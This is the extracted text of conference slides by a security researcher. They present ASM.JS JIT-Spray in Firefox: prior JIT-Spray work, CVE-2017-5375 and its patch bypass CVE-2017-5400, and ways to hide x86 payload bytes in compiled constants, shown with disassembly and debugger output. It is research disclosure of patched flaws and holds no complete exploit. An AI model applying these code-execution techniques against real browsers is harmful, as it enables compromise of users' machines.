from assembly to javascript and back: turning …repository.root-me.org/exploitation -...
TRANSCRIPT
![Page 1: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/1.jpg)
Robert Gawlik
Ruhr University Bochum
February 12-17 // Berlin
From Assembly to Javascript and back:Turning Memory Errors into Code Execution
with Client-side Compilers
![Page 2: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/2.jpg)
About me • IT Security since 2010
• PostDoc – Systems Security Group @ Horst Görtz Institute / Ruhr-University Bochum
• Focus on low-level security, binary analysis and exploitation, fuzzing, client-side mitigations/attacks
• @rh0_gz, [email protected]
![Page 3: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/3.jpg)
Agenda• JIT-Spray and previous work
• ASM.JS and JIT-Spray:
– #1 CVE-2017-5375– #2 CVE-2017-5400 (bypass of patch for #1)
• Generic ASM.JS payload generation • Exploitation with ASM.JS JIT-Spray
– CVE-2016-9079, CVE-2016-2819, CVE-2016-1960
![Page 4: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/4.jpg)
2018
// JIT-Spray //
![Page 5: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/5.jpg)
JITJust-In-Time Compilation (JIT)
• Generate native machine code from higher-level language
• Performance gain compared to interpreted execution
• Several compilers and optimization layers– Webkit: Baseline, DataFlowGraph, FasterThanLight– Firefox: Baseline, JaegerMonkey (deprecated), IonMonkey– Chromium: CrankShaft (deprecated), TurboFan– eBPF-JIT– … you name it (Tamarin, NanoJit, etc. )
![Page 6: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/6.jpg)
JIT-Spray1. Hide native instructions in constants of high-level language
c = 0xa8909090c += 0xa8909090
00: b8909090a8 mov eax, 0xa890909005: 05909090a8 add eax, 0xa8909090
01: 90 nop02: 90 nop03: 90 nop04: a805 test al, 506: 90 nop07: 90 nop08: 90 nop
x86 Disassembly @ ofset 1
Emitted JIT Code
![Page 7: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/7.jpg)
JIT-Spray1. Hide native instructions in constants of high-level language
c = 0xa8909090c += 0xa8909090
00: b8909090a8 mov eax, 0xa890909005: 05909090a8 add eax, 0xa8909090
x86 Disassembly @ ofset 1
Emitted JIT Code
01: 90 nop02: 90 nop03: 90 nop04: a805 test al, 506: 90 nop07: 90 nop08: 90 nop
semantic nop
![Page 8: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/8.jpg)
JIT-Spray1. Hide native instructions in constants of high-level language
2. Force allocations to predictable address regions
function JIT(){c = 0xa8909090c += 0xa8909090
}
While (not address_hit){createFuncAndJIT()
}
0x20202021: 90 nop0x20202022: 90 nop0x20202023: 90 nop0x20202024: a805 test al, 50x20202025: 90 nop0x20202026: 90 nop0x20202027: 90 nop
predictable?!
![Page 9: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/9.jpg)
JIT-Spray1. Hide native instructions in constants of high-level language
2. Force allocations to predictable address regions
function JIT(){c = 0xa8909090c += 0xa8909090
}
While (not address_hit){JIT()
}
0x20202021: 90 nop0x20202022: 90 nop0x20202023: 90 nop0x20202024: a805 test al, 50x20202025: 90 nop0x20202026: 90 nop0x20202027: 90 nop
predictable?!
Used to bypass DEP and ASLRNo infoleak and code reuse necessary
![Page 10: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/10.jpg)
JIT-SprayFlash JIT Spray (Dionysus Blazakis, 2010)
• Targets ActionScript (Tamarin VM)
• Long XOR sequence gets compiled to XOR instructions
• First of its kind known to public
![Page 11: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/11.jpg)
JIT-SprayFlash JIT Spray (Dionysus Blazakis, 2010)
• Targets ActionScript (Tamarin VM)
• Long XOR sequence gets compiled to XOR instructions
• First of its kind known to public
• Mitigated by constant folding
→ Bypassed with “IN” operator (VAL0 IN VAL1 ^ VAL2 ^ ..)
• ...and mitigated with random nop insertion
![Page 12: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/12.jpg)
JIT-SprayWriting JIT Shellcode (Alexey Sintsov, 2010)
• Nice methods to ease and automate payload generation: – split long instructions into instructions <= 3 bytes
– semantic nops which don’t change fags
; 5 bytesmov ebx, 0xb1b2b3b4
mov ebx, 0xb1b2xxxx ; 3 bytesmov bh, 0xb3 ; 2 bytesmov bl, 0xb4 ; 2 bytes
00: b89090906a mov eax, 0x6a90909005: 05909090a8 add eax, 0xa8909090
03: 90 nop04: 6a05 push 5
![Page 13: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/13.jpg)
JIT-SprayJIT-Spray Attacks & Advanced Shellcode(Alexey Sintsov, 2010)
• JIT-Spray in Apple Safari on Windows possible:
– use two of four immediate bytes as payload
– connect payload bytes with short jumps (stage0)
– copy stage1 payload to RWX JIT page and jump to it
![Page 14: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/14.jpg)
JIT-SprayJIT-Spray Attacks & Advanced Shellcode(Alexey Sintsov, 2010)
• Still works in Windows 10 on old Safari (CVE-2010-1939)
![Page 15: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/15.jpg)
JIT-SprayAttacking Clientside JIT Compilers(Chris Rohlf & Yan Ivnitskiy, 2011)
• In depth analysis of LLVM and Firefox JIT engines
• JIT-Spray techniques (i.e., with foating point values)
• JIT gadget techniques (gaJITs)
• Comparison of JIT hardening measurements
![Page 16: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/16.jpg)
JIT-SprayAttacking Clientside JIT Compilers(Chris Rohlf & Yan Ivnitskiy, 2011)
• In depth analysis of LLVM and Firefox JIT engines
• JIT-Spray techniques (i.e. with foating point values)
• JIT gadget techniques (gaJITs)
• Comparison of JIT hardening measurements
![Page 17: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/17.jpg)
JIT-SprayFlash JIT – Spraying info leak gadgets (Fermin Serna, 2013)
• Bypass ASLR and random NOP insertion:
– spray few instructions to predictable address – prevents random NOPS – trigger UAF bug and call JIT gadget – JIT gadget writes return address into heap spray, continue execution in JS
• Mitigated with constant blinding in Flash 11.8
![Page 18: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/18.jpg)
JIT-SprayExploit Your Java Native Vulnerabilities on Win7/JRE7 in One Minute (Yuki Chen, 2013)
• JIT-Spray on Java Runtime Environment
• 3 of 4 bytes of one constant usable as payload
• Spray multiple functions to hit predictable address (32-bit)
• Jump to it with EIP control
![Page 19: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/19.jpg)
JIT-SprayExploit Your Java Native Vulnerabilities on Win7/JRE7 in One Minute (Yuki Chen, 2013)
• School book JIT Spray on JRE 7
• 3 of 4 bytes of one constant usable as payload
• Spray multiple functions to hit predictable address (32-bit)
• Jump to it with EIP control
![Page 20: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/20.jpg)
JIT-SprayJIT Spraying Never Dies - Bypass CFG By LeveragingWARP Shader JIT Spraying (Bing Sun et al., 2016)
• WARP: Software Rasterizer – Shaders usable from WebGL
• Shader JIT code allocations predictable
• No CFG for JIT-ed code
• Various challenges for 64-bit MS Edge, i.e., arbitrary read/write necessary
![Page 21: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/21.jpg)
2018
// ASM.JS JIT-Spray //
![Page 22: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/22.jpg)
ASM.JS• Appeared in 2013 in Firefox 22
• First thought: Use it for JIT-Spray! However, idea not pursued until end of 2016 • Ahead-Of-Time (AOT) Compiler
• No need to frequently execute JS as in traditional JITs
• Generates binary blob with native machine code
![Page 23: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/23.jpg)
ASM.JSSimple ASM.JS module
• Prolog directive
![Page 24: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/24.jpg)
ASM.JSSimple ASM.JS module
• Prolog directive
• ASM.JS module body
![Page 25: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/25.jpg)
ASM.JSSimple ASM.JS module
• Prolog directive
• ASM.JS module body
• Your “calculations”
![Page 26: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/26.jpg)
ASM.JSSimple ASM.JS module
• Prolog directive
• ASM.JS module body
• Your “calculations”
![Page 27: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/27.jpg)
ASM.JSFirst Test with Firefox
• Request ASM.JS module several times
• Search for 0xc1c2c3c4 in memory
![Page 28: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/28.jpg)
ASM.JSFirst Test with Firefox
• Search for 0xc1c2c3c4 in memory
0:031> s -d 0 L?ffffffff c1c2c3c409bf9024 c1c2c3c4 c4839066 0d8bc304 000000000a720024 c1c2c3c4 c4839066 0d8bc304 0a7210000a730024 c1c2c3c4 c4839066 0d8bc304 0a7310000a740024 c1c2c3c4 c4839066 0d8bc304 0a7410000a750024 c1c2c3c4 c4839066 0d8bc304 0a7510000a760024 c1c2c3c4 c4839066 0d8bc304 0a761000...
![Page 29: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/29.jpg)
0:031> s -d 0 L?ffffffff c1c2c3c409bf9024 c1c2c3c4 c4839066 0d8bc304 000000000a720024 c1c2c3c4 c4839066 0d8bc304 0a7210000a730024 c1c2c3c4 c4839066 0d8bc304 0a7310000a740024 c1c2c3c4 c4839066 0d8bc304 0a7410000a750024 c1c2c3c4 c4839066 0d8bc304 0a7510000a760024 c1c2c3c4 c4839066 0d8bc304 0a761000...
ASM.JSFirst Test with Firefox
• Search for 0xc1c2c3c4 in memory
Wait what?!?
Many requests yield many copies?
![Page 30: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/30.jpg)
0:031> s -d 0 L?ffffffff c1c2c3c409bf9024 c1c2c3c4 c4839066 0d8bc304 000000000a720024 c1c2c3c4 c4839066 0d8bc304 0a7210000a730024 c1c2c3c4 c4839066 0d8bc304 0a7310000a740024 c1c2c3c4 c4839066 0d8bc304 0a7410000a750024 c1c2c3c4 c4839066 0d8bc304 0a7510000a760024 c1c2c3c4 c4839066 0d8bc304 0a761000...
ASM.JSFirst Test with Firefox
• Search for 0xc1c2c3c4 in memory
Wait what?!?
Many requests yield many copies?
It is 64k aligned (0xXXXX0024)?
![Page 31: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/31.jpg)
0:031> s -d 0 L?ffffffff c1c2c3c409bf9024 c1c2c3c4 c4839066 0d8bc304 000000000a720024 c1c2c3c4 c4839066 0d8bc304 0a7210000a730024 c1c2c3c4 c4839066 0d8bc304 0a7310000a740024 c1c2c3c4 c4839066 0d8bc304 0a7410000a750024 c1c2c3c4 c4839066 0d8bc304 0a7510000a760024 c1c2c3c4 c4839066 0d8bc304 0a761000...
ASM.JSFirst Test with Firefox
• Search for 0xc1c2c3c4 in memory
Wait what?!?
Many requests yield many copies?
It is 64k aligned (0xXXXX0024)?
Looks promising :-)
![Page 32: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/32.jpg)
ASM.JSFirst Test with Firefox
… indeed
0:031> u 10100023 L 410100023 b8c4c3c2c1 mov eax,0C1C2C3C4h10100028 6690 xchg ax,ax1010002a 83c404 add esp,41010002d c3 ret
![Page 33: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/33.jpg)
ASM.JSFirst Test with Firefox
… indeedconstant is compiledahead of time topredictable address
0:031> u 10100023 L 410100023 b8c4c3c2c1 mov eax,0C1C2C3C4h10100028 6690 xchg ax,ax1010002a 83c404 add esp,41010002d c3 ret
![Page 34: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/34.jpg)
ASM.JSFirst Test with Firefox
… indeedconstant is compiledahead of time into code
0:031> u 10100023 L 410100023 b8c4c3c2c1 mov eax,0C1C2C3C4h10100028 6690 xchg ax,ax1010002a 83c404 add esp,41010002d c3 ret
![Page 35: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/35.jpg)
ASM.JS JIT-SprayCVE-2017-5375
• Example: nop sled with ASM.JS (Firefox 50.0.1 32-bit)
![Page 36: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/36.jpg)
ASM.JS JIT-Spray
![Page 37: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/37.jpg)
ASM.JS JIT-Spray
No infoleak, no code reuse,use your vuln to point EIP to your
payload
![Page 38: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/38.jpg)
ASM.JS JIT-SprayCVE-2017-5375
• The faw (simplifed)
1) ASM.JS module is compiled into RW region 2) each module request executes VirtualAlloc 3) → many RW regions at 64k granularity → predictable 4) compiled module code is copied many times to RW regions 5) RW regions are VirtualProtect’ed to RX
![Page 39: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/39.jpg)
ASM.JS JIT-SprayCVE-2017-5375
• The patch 1) Randomize VirtualAlloc allocations
randomAddr = ComputeRandomAllocationAddress();p = VirtualAlloc(randomAddr, ...if (!p) { // Try again without randomAddr. p = VirtualAlloc(nullPtr, ...
![Page 40: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/40.jpg)
ASM.JS JIT-SprayCVE-2017-5375
• The patch 1) Randomize VirtualAlloc allocations
2) Limit ASM.JS RX code per process to 160MB
randomAddr = ComputeRandomAllocationAddress();p = VirtualAlloc(randomAddr, ...if (!p) { // Try again without randomAddr. p = VirtualAlloc(nullPtr, ...
maxCodeBytesPerProcess = 160 * 1024 * 1024;
![Page 41: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/41.jpg)
ASM.JS JIT-SprayCVE-2017-5375
• The patch 1) Randomize VirtualAlloc allocations
2) Limit ASM.JS RX code per process to 160MB
randomAddr = ComputeRandomAllocationAddress();p = VirtualAlloc(randomAddr, ...if (!p) { // Try again without randomAddr. p = VirtualAlloc(nullPtr, ...
maxCodeBytesPerProcess = 160 * 1024 * 1024;
Fixed in Firefox 51
![Page 42: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/42.jpg)
ASM.JS JIT-SprayCVE-2017-5375
• The patch 1) Randomize VirtualAlloc allocations
2) Limit ASM.JS RX code per process to 160MB
randomAddr = ComputeRandomAllocationAddress();p = VirtualAlloc(randomAddr, ...if (!p) { // Try again without randomAddr. p = VirtualAlloc(nullPtr, ...
maxCodeBytesPerProcess = 160 * 1024 * 1024;
Fixed in Firefox 51Bypass it! :)
→ CVE-2017-5400
![Page 43: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/43.jpg)
ASM.JS JIT-SprayCVE-2017-5400
• Bypass patch #1: force fallback code
– occupy as many 64k addresses as possible with Typed Arrays heap spray to decrease entropy → randomAddr ASM.JS JIT allocations will fail → fallback allocations become predictable again
p = VirtualAlloc(randomAddr, ...if (!p) { // Try again without randomAddr. p = VirtualAlloc(nullPtr, ...
![Page 44: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/44.jpg)
ASM.JS JIT-SprayCVE-2017-5400
• Bypass patch #2: stay within ASM.JS code limit of 160MB ;)
– spray max allocations allowed, assuming that each module will be < 64KB (est. good enough for exploitation:P)
• Release memory allocated with Typed Array Spray (#1)
maxCodeBytesPerProcess = 160 * 1024 * 1024;
![Page 45: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/45.jpg)
ASM.JS JIT-Spray
![Page 46: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/46.jpg)
ASM.JS JIT-SprayCVE-2017-5400
• The patch
– major redesign – reserve maxCodeBytesPerProcess range on startup
→ difcult to predict address
– commit/decommit from this set of pages for ASM.JS/Wasm when requested
![Page 47: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/47.jpg)
2018
// ASM.JS Payloads //
![Page 48: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/48.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• How to write arbitrary payloads?
![Page 49: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/49.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Arithmetic instructions
![Page 50: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/50.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Arithmetic instructions
– problems: - constant folding - test changes fags
01: 90 nop02: 90 nop03: 90 nop04: a805 test al, 506: 90 nop07: 90 nop08: 90 nop
![Page 51: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/51.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Setting array elements
![Page 52: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/52.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Setting array elements
01: 90 nop02: 90 nop03: eb0c jmp 0x11..11: 90 nop12: 90 nop13: eb0c jmp 0x21
![Page 53: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/53.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Setting array elements
2 payload bytes
01: 90 nop02: 90 nop03: eb0c jmp 0x11..11: 90 nop12: 90 nop13: eb0c jmp 0x21
![Page 54: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/54.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Setting array elements
2 payload bytes
connect with jumps
01: 90 nop02: 90 nop03: eb0c jmp 0x11..11: 90 nop12: 90 nop13: eb0c jmp 0x21
![Page 55: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/55.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Using ASM.JS imports (Foreign Function Interface)
![Page 56: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/56.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Using ASM.JS imports (Foreign Function Interface)
– import a JS function into your ASM.JS code
![Page 57: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/57.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Using ASM.JS imports (Foreign Function Interface)
– import a JS function into your ASM.JS code
– call it with many parameters
![Page 58: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/58.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Using ASM.JS imports (Foreign Function Interface)
– import a JS function into your ASM.JS code
– call it with many parameters – hide payload in parameters
![Page 59: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/59.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Using ASM.JS imports (Foreign Function Interface)
00: c70424909090a9 mov dword [esp], 0xa990909007: c7442404909090a9 mov dword [esp + 4], 0xa99090900f: c7442408909090a9 mov dword [esp + 8], 0xa9909090
emitted code
![Page 60: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/60.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Using ASM.JS imports (Foreign Function Interface)
03: 90 nop04: 90 nop05: 90 nop06: a9c7442404 test eax,42444C7h0b: 90 nop0c: 90 nop0d: 90 nop0e: a9c7442408 test eax,82444C7h
![Page 61: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/61.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Using ASM.JS imports (Foreign Function Interface)
03: 90 nop04: 90 nop05: 90 nop06: a9c7442404 test eax,42444C7h0b: 90 nop0c: 90 nop0d: 90 nop0e: a9c7442408 test eax,82444C7h
3 payload bytes per instruction
large semantic nops
